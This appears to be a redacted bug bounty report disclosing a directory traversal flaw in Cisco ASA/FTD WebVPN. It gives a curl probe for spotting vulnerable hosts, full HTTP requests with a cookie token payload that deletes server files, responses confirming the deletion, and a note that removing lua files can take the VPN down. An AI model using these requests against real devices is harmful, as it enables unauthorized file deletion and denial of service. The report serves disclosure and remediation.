Summary:
A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.
Description:
Vulnerable host:
██████████
An exploit could allow the attacker to view or delete arbitrary files on the system.
1.Identifying vulnerable host by send request to /+CSCOE+/session_password.html.
curl -skiL “███/+CSCOE+/session_password.html”
GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1
If the target is vulnerable, the response header will display webvpn header, like:
The request gave me the following response
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
2.Perform exploits to delete files by adding token in cookie header request.
For example, I wanted to delete this (██████/+CSCOU+/csco_logo.gif) file.
That did not work because sometimes logo.gif/png has permission issues so try this “█████/+CSCOE+/blank.html”
You can also delete the file “/+CSCOE+/blank.html” (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files
Request:
Host: ██████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1```
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>
**3. So I exploited the CVE and deleted the blank file. As following:**
Request:
GET /+CSCOE+/session_password.html HTTP/1.1
Host: █████████
Cookie: token=…/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: /
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:
File deleted successfully:
`curl -Ik ████/+CSCOE+/blank.html`
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN
File not found
Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.
## Suggested Mitigation/Remediation Actions
Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
## Impact
*High - This vulnerability allows the attacker to delete files within the web services file system.*